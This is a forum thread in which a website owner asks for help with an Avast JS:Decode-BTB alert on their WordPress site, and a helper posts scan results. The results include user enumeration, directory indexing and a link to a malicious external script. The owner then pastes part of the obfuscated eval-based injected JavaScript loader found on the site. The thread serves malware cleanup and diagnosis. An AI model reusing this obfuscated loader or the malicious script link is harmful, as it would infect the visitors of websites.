Hola q tal, siempre que me conecto a mi web hxxp://www.vijaga.com avast me envía el mensaje de que me ha bloqueado una infección de js decode-btb y es muy molesto, porque en principio está todo ok. También confunde mi url y me pone otra…
El caso es que no logro encontrar el problema. He escaneado el código en webs para detectarlo y nada, todo me sale bien…
Ayuda?
post in english
Killmalware report / vijaga.com http://killmalware.com/www.vijaga.com/
IP history (213.186.33.19) https://www.virustotal.com/en/ip-address/213.186.33.19/information/
Multiple domains on same IP and many are Blacklisted
IPvoid http://www.ipvoid.com/scan/213.186.33.19
URLvoid http://www.urlvoid.com/ip/213.186.33.19
[b]IP ADDRESS: 213.186.33.19[/b]We have found in our database of already analyzed websites that there are 12280 websites hosted in the same web server with IP address 213.186.33.19 and IP hostname cluster010.ovh.net. Remember that it is not good to have too many websites located in the same web server because if a website gets infected by malware, it can easily affect the online reputation of the IP address and also of all the other websites.
There is malware on this website: -adahb.org/elements/include/jquery-migrate.min.g.js Malware
See: https://urlquery.net/report.php?id=1438793675403
WordPress Version
4.2.4
Version is current
Found in /readme.html
WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.
wpfront-scroll-top 1.4.4 latest release (1.4.4)
http://wpfront.com/scroll-top-plugin/
folder-gallery 1.7.2 latest release (1.7.2)
http://www.jalby.org/wordpress/
WordPress Theme
The theme has been found by examining the path /wp-content/themes/ theme name /
vijagatema2 1.0
While plugins get a lot of attention when it comes to security vulnerabilities, themes are another source of security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers theme page for information about security related updates and fixes.
Warning User Enumeration is possible
The first two user ID’s were tested to determine if user enumeration is possible.
User ID 1 : vijaga
User ID 2 : None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.
Only the first two user ID’s were tested with this scan, use the Nmap NSE enumeration scripts (use your own Nmap installation or try option 2 below) to discover additional user ID’s.
Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.
/wp-content/uploads/ enabled
/wp-content/plugins/ disabled
Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directores. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.
Website has a direct link to malware: https://app.webinspector.com/public/reports/37857749
This is a high risk page
Result for 2015-07-21 12:16:03 UTC
Website: htxp://adahb.org
Checked URL: htxp://adahb.org/elements/include/jquery-migrate.min.g.js
Links to malware files detected:
Link to Malware File. Comodo analysts verdict.
SHA1: 803744244c357ba83ba392c7229e90671c0b654c
Link to Malware File. Found by Antivirus Engine.
SHA1: 803744244c357ba83ba392c7229e90671c0b654c
Avast detects JS:Decode-BTB [Trj] and not only Avast detects but 11 other AV-vendors:
https://www.virustotal.com/en/file/9597d3714a6c553d3b2a28777fe65da00836def7cf497e14c9a58e6b7de2bf3f/analysis/
polonus
Hi hi,
Thanks for the info.
I suppose that I have to find this malicious code in some file in my site folders and delete it, right?
But it is possible to find the file faster? it is a .php or .js ? It makes me crazy…
var _1007;var _7416=‘1188D126E108A1212C1086D1188B696E1224E870E1104D1170F1098A1206D1158E1110F1164C1200B780B1188D1110A1116F1110A1188D1188D1110A1188A858A564E1212A1086A1188D696C1128B1170D1194C1200B870F1218A1134B1164C1104A1170C1218D780D1152A1170A1098D1086E1200A1134F1170E1164E780F1128D1170F1194A1200E1164F1086B1158B1110C858B564E1212E1086E1188C696E1116F870E1224D780A1134D1164E1104C1110D1224B978A1116E744B1128C1170D1194A1200F750A858F696C564A1134A1116D744F1116F864A792B696E732F732B696C1224A696D702F870D696E73
… 658 bytes are skipped …
7276_8255/21);var _3420=(_8255==7)?String:eval;_6210=’‘;_11=_7276_8255/_7276_8255;for(_1007=3;_1007<_11;_1007++)_6210+=(_7276_8255-2);var _3254=’_6221’;var _2564=‘_3254=_6210’;function _8457(_1395){_3420(_5918);_8457(_6771);_6771(_2564);_8457(_3254);}var _5918=‘_8457=_3420’;var _6771=‘_6771=_8457’;_8457(_5219);
Thanks again!
i think this URL is the problem hxxp://adahb.org/elements/include/jquery-migrate.min.g.js
as displayed at Killmalware http://killmalware.com/www.vijaga.com/